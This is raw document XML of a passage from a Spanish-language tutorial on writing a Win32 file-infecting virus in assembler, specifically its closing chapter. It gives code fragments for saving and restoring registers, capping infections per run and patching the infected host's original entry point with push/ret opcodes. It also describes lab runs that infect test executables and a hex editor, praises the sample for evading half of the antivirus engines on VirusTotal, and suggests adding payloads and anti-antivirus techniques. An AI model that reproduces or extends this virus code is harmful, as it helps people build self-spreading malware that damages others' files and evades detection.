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Terminando la infección y algunas consideraciones fina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Bien, acá llegamos ya al final de este tutorial y a la terminación de nuestro primer especím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todo casi listo y sólo nos queda hacer algunos ajustes finales y por último pasarle el control al host original para que continúe su ejecución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amos a ver dos instrucciones que van a proteger la ejecución normal del host y que básicamente lo que hacen es guardar los registros originales y los flags para luego volverlos a su estado original luego de la ejecución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as instrucciones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USHAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sta instrucción guarda el contenido de los registros en la pila (stack) en un orden determinado, esto equivale a hacer un push EAX, push ECX, push EDX, push EBX, push ESP, push EBP, push ESI, push EDI.</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PUSHFD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: esta instrucción guarda el contenido del registro de Flags en la pila (stack).</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cuando terminemos nuestro código repararemos todo utilizando POPAD y POPFD, que básicamente restauran los valores almacenados en la pila en los registros correspondientes. De esta forma protegeremos la ejecución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Vamos a gregar estas dos funciones y para eso vamos a tener que ajustar un poco el código. Primeramente nos posicionamos en el inicio de nuestro código, inmediatamente luego de la etiqueta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iniciovir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y antes del cálculo de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mplemente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a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sto nos moverá el puntero de la pila y tendremos que ajustar la rutina que busca la dirección del kernel32, recordemos que nosotros lo habíamos creado dentro de una subrutina y la llamábamos c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bien, vamos a la rutina y vemos que sacamos un valor del stack, pero antes le sumábamos 0Ch por la llamada a dicha rutina (esto lo pueden ver en el capítulo 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dword ptr ds:[esp + 0Ch]        ; saca de la pila el ret del CreateProcess  ---------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Agreguemos el pushad y el pushfd al inicio del programa, compilémoslo y veámoslo dentro del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el programa con F7 para que ingrese en las rutinas, la que a nosotros nos interesa es la búsqueda del kernel32, que es la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7614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676140" cy="1114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ingresar a la misma vemos que en un momento recupera el valor del stack (+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4736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6" r="-12" b="-46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3047365" cy="781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 la pila y veamos que pasó con la dirección de retorno de la función del kernel32:</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7" r="-10" b="-27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3704590" cy="13239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ver la dirección como desplazamiento hacemos doble click sobre la barra izquierda (dirección) y vemos que se ha desplazado 30h lugares, esto es p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t>20h: por el push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04h: por el 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 sea que si sumamos todos estos valores tendremos 030h que es el desplazamiento que vemos en el OllyDbg. Para solucionar esto simplemente modificamos la instrucción anterior dejándol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dword ptr ds:[esp + 030h]        ; saca de la pila el ret del CreateProcess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valores guardados, ahora lo que vamos a hacer es restaurarlos al terminar la inección, para eso ubicamos la etiqueta volverHost que por ahora solamente tiene un jmp host, pero que luego modificaremos y le agregamos una comprobación para que nos funcione en la primera infección y luego las dos instrucciones de recuperación de regist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f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comparar ebp con cero lo que estamos haciendo es comparar el Delta Offset, que únicamente valdrá cero en la primera infección, si es este el caso saltamos al mensaje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respecto a las instrucciones de recuperación de valores de la pila, recuerden que van en orden inverso al push por la estructura de la pila donde lo último en ingresar es lo primero en salir (LIFO: Last In First Ou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greguemos estas dos instrucciones, compilemos y vamos al OllyDbg a ver como funciona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eamos el valor de los registros y de los flag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3990"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713990" cy="1695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controlemos el stack para ver que antes de devolverle el control al host quede todo como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704590" cy="25336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pongamos un BP justo antes de saltar la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66515"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4" r="-9" b="-74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3866515" cy="4857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con F9. Veremos que ha quedado todo como si no hubiéramos ejecutado nada. Esto es muy importante ya que si queremos pasar desapercibidos tenemos que ser muy cuidadosos con los valores que alteramos, sobre todo el stack que debe quedar correctamente balance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go que comentamos en el capítulo 9 fue el límite a la cantidad de infeciones que queremos realizar por cada ejecución, y habíamos creado una variable en nuestro código llamada maxInfecciones. Ahora tenemos que modificar nuestro código para que respete este tope, para eso nos vamos a la rutina de infección, justo después de comprobar que el archivo es “infectable” (las 5 comprobaciones que vimos en el capítulo 11) e incrementamos el contador de infe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archivosInfec]                            ; incrementa el contado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tenemos que controlar que no nos pasemos de este contador, esto lo tenemos que realizar antes de llamar nuevamente a la rutina de infección, esto lo colocamos en la parte inicial del código donde buscábamos el siguiente archivo a infectar, luego de la etiqueta 'buscaVictima’ y justo antes de llamar a la rutina de inf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buscaVictim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ea     </w:t>
        <w:tab/>
        <w:t>edx, [ebp + offset win32_find_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w:t>
        <w:tab/>
        <w:t>ebx, [ebp + offset handleBusq]</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 xml:space="preserve">[ebp + offset zFindNext]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 xml:space="preserve">eax, 0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cmp          [ebp + offset archivosInfec], maxInfecciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jg              volverHost                                      ; si llegamos al limite, salimos</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 xml:space="preserve">buscaVictim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jo, sólo agregamos las dos línes resaltadas en negri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Ya estamos dejando todo listo, lo que nos queda ahora es modificar el código del archivo infectado para que una vez que termine de realizar el trabajo del virus pueda seguir ejecutándose normalmente. Además tenemos que devolverle el control al host original, que hasta ahora simplemente hacíamos  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jmp host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> porque estamos en la primer infección. Ojo porque esto es importante que quede claro y que se entienda bi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ensemos por un momento que esta infección ya está ejecutándose desde otro archivo, donde nuestra ubicación dentro del host solo la conocemos gracias al delta offset y alteramos su ejecución con la modificación del entry point original para que apunte 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bien, en el capítulo 12 vimos que antes de modificar el OEP (Original Entry Point) lo guardábamos en una variable que llamamos entryPoinOrig. Justamente esa variable vamos a utilizar para devolverle el control a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formas de realizar esto, yo elegí esta porque me parece sencilla y elegante, pero pueden desarrollar sus propias rutin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haremos será simular el siguiente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el funcionamiento de la pila en las llamadas a subrutinas (capítulo 3), al hacer un ret el SO toma el valor que se encuentra en la parte superior del stack y lo coloca en el resgistro EIP para seguir la ejecución desde ese punto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En realidad no lo vamos a escribir directamente, vamos a colocar los opcodes. Esto lo debemos colocar justo después del popfd y del popad (además debemos sacar la instrucción </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jmp hos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que durante la compilación no tenemos el valor del OEP, asi que por ahora dejamos el valor en 0. Nos quedarí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68h,0,0,0,0               ; simula un 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                                     ; regresamos a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comprobamos si estamos en la primera infección, en cuyo caso saltamos al mensaje original, luego armamos la estructura del push / ret y queda de esta forma ya que el opcode del push es justamente 06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solo nos queda modificar estos ceros en cada programa que infectemos para que en cada caso guarde los OEP’s correspondientes, para eso nos vamos a la rutina de infección justo después de que copiáramos nuestro virus y que lo marcáramos como “infectado”, y antes de desmapear de memoria al archivo que estamos infec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lí coloc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hostPE]           ; ebx = offset de la cabecera P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bx + 034h]                       ; ebx = ImageBas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entryPoinOrig]  ; recuperamos el entry point origin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bx                                      ; le sumamos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ea       ecx, [offset volverHost + 12]</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ub      ecx, offset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c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xpliquemos esto un poco. Es muy importante que nos olvidemos por un momento de la ejecución actual y pensemos como será la futura ejecución del host que estamos infectando, lo primero que hacemos es recuperar la ImageBase del host para luego poder corregir las RVAs del mismo (por eso buscamos su ImageBa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recuperamos en eax la dirección del OEP y la normalizamos, y ya nos queda lista para luego hacer el salto correctamente a través del push / ret que vimos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debemos ubicar los ceros que dejamos anteriormente para que nos quede armado el push correctamente, teniendo en mente que lo que vamos a modificar es el archivo que tenemos mapea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rimero cargamos en edi el valor donde comienza el virus (UltimaSeccPE), luego cargamos en ecx la dirección de la etiqueta volverHost más 012h para no pisar el código que ya tenemos ahí (+2 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +7 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>je</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popfd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>opcode 068h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Por último restamos la dirección de inicio del virus (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sub  ecx, offset iniciovir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) y así nos queda solamente el desplazamiento de esta etiqueta (dir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tratar de explicar esto gráficamente para que se entienda bien el concepto ya puede resultar un poco confus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object w:dxaOrig="10718" w:dyaOrig="6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15pt;height:279.5pt" filled="f" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId8" DrawAspect="Content" ObjectID="_769591269" r:id="rId8"/>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alternativa que podríamos haber utilizado es cambiar la dirección del OEP directamente en el código en ejecución y luego copiar el virus para que ya vaya listo, esto lo tendríamos que hacer igualmente para cada archivo a infectar ya que cada uno tendrá su propio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que terminamos por fin el código de nuestro virus, vamos a hacer algunas experimentos. Para probar este especímen en particular yo me creé un directorio llamado ‘Laboratorio’ y dentro del mismo hice un subdirectorio llamado ‘bak’ donde coloqué varias copias limpias del programa básico que muestra un mensaje en panta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ntro de ‘Laboratorio’ coloqué la muestra del virus y un archivo llamado restaurador.bat (archivo de lotes) muy sencillo que me restaura el laboratorio y me lo deja listo para una nueva sesión, tiene sólo un simple com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copy C:\ Virus\bak\*.*</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2694" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esto puede parecer muy elemental, pero tiene la ventaja que si hacemos doble click sobre este archivo deja todo listo para una próxima prueb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aclarar que esto sólo sirve para este caso donde el virus es muy sencillo y donde sabemos exactamente qué hace, pero si estamos realizando un virus más complejo, que recorre la estructura de directorios, o tiene un payload dañino, debemos ser muy cuidadosos y en ese caso lo más recomendable es trabajar directamente en un entorno virtualizado (con VMWare, Microsoft Virtual PC, Oracle VirtualBox, etc.) y desconectado de re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na aclaración, el payload de un virus es cualquier acción que lleve a cabo el mismo, además de su propia propagación, en nuestro caso no tenemos ningún payload ya que no es la finalidad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ya tenemos nuestro laboratorio, ahora realicemos algunas pruebas. Yo tengo 7 copias del programa básico más el virus. Es fácil detectar los archivos infectados ya que los mismo aumentan de tamañ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jecutamos el virus una vez y observ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349625" cy="1740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3349625" cy="17405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mos que efectivamente los tres primeros archivos fueron infectados, ya que su tamaño aumentó de 3 Kb a 5Kb. Justamente 3 fue el límite que le impusimos dentro d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ejecutemos uno de estos nuevos archivos infectados, por ejemplo ‘asm001.ex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infecta los tres archivos siguie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13175" cy="2010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5" r="-8" b="-15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3813175" cy="20104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o ejecutamos una vez más vemos que termina de infectar el último (asm007.exe) y listo, de ahí en más no hace nada ya que todos los archivos están infectados y marcados como tal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ahora comparemos el archivo que quedó limpio (asm007.exe) con uno infectado (asm001.exe), para eso vamos a utilizar la herramienta que vimos en el capítulo 4, PE-Tools. La ejecutamos y seleccionamos dentro del menú superior la opción ‘Tools -&gt; PE Edit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642745" cy="150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20" r="-19" b="-20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1642745" cy="15081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brimos el archivo asm007.exe (limpio) y luego presionamos la opción ‘Compare’ y seleccionamos el archivo asm001.exe (infectado). Esto básicamente va a comparar las cabeceras de ambos archivos, no su con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 continuación muestra las diferencias entre ambos marcadas con una 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46805" cy="2258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3646805" cy="225806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as recorremos todas tendr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8472" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="279" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3348"/>
        <w:gridCol w:w="2572"/>
        <w:gridCol w:w="2552"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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7 (limpio)</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1 (infectado)</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File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200</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ress Of Entry Poin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200</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Win32  Version Valu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7A65726F (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:i/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>zero</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</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Imag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0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000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="435" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="847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18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sección .data</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Physical Addres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Virtual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RawData</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haracteristic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0000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E000060</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 es justamente lo que hemos estado realizando a través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demos probar con otros ejecutables más complejos, por ejemplo con el editor hexadecimal que utilizamos en el capítulo 4 (HEdit.exe), lo colocamos dentro del laboratorio, lo infectamos y luego nos traemos los archivos de prueba limpios (asm001, asm002,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amos nuestro HEdit.exe infectado, y vemos por un lado que se ejecuta normalmente y además si observamos en el directorio vemos que infectó tres archivos, igual que nuestras pruebas anteri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8220" cy="1965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4" r="-8" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3538220" cy="19653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da en ustedes seguir probándolo, incluso pueden cargar el programa HEdit.exe infectado con el Olly y seguir su ejecución desde allí. Prueben, prueben y prueben, y mejoren el código que esa es le mejor forma de apren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ambién podemos subirlo a VirusTotal (</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>https://www.virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), que es un página que ofrece un servicio de multiescaneo de archivos online. En mi caso dio el siguiente resul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241925" cy="270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8" r="-4" b="-8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5241925" cy="2708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a verdad es que es bastante bueno, ya que este virus dista mucho de ser algo decente y además tiene rutinas muy evidentes que lo delatan. Así y todo sólo lo detectaron 20 de 42 antivirus. Bien por él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so es todo, llegamos al final de esta introducción a la programación de virus en Assembler. Si quieren seguir avanzando en este maravilloso mundo, el camino es largo, pero apasionante. Pueden empezar por mejorar este virus o empezar uno de cero, cambiar las rutinas, tanto el cálculo del delta offset, la búsqueda de APIs, la búsqueda del kernel32 (puede ser por ejemplo utilizando el PEB), o agregar un payload, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="-3261" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="-3261" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>También pueden ver código de otras personas para seguir aprendiendo o ver técnicas avanzadas, como hooking, antidebugguing, polimorfismo, técnicas anti-antivirus, packing, encriptación, ofuscación, Entry Point Obscuring y un largo, largo etcéter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antes de terminar quiero agradecer atodos los que leyeron esta guía, a todos los que escriben y comparten lo que saben para que yo pudiera hacer esto posible, y en general a todos los que escriben de estos temas con el único interés de aprender y de ayudar a difundir el conoci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pecialmente quiero agradecer a la gente de la lista Sector Virus (http://groups.google.com.ar/group/sector-virus) y de CracksLatinoS (https://groups.google.com/group/crackslatinos) quienes siempre me brindaron su apoyo y compartieron todo conm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Gracias a todos, y lean, prueben, aprendan y sobre todo, sean responsables. Los dejo con una frase que para mi resume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t xml:space="preserve">"Viruses don't harm, ignorance does!"  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>("Los virus no hacen daño, la ignorancia lo hace")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>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17"/>
      <w:footerReference w:type="default" r:id="rId18"/>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4</w:t>
    </w:r>
  </w:p>
</w:hd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s://www.virustotal.com/" TargetMode="External"/><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5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25T02:53:00Z</dcterms:modified>
  <cp:revision>2906</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>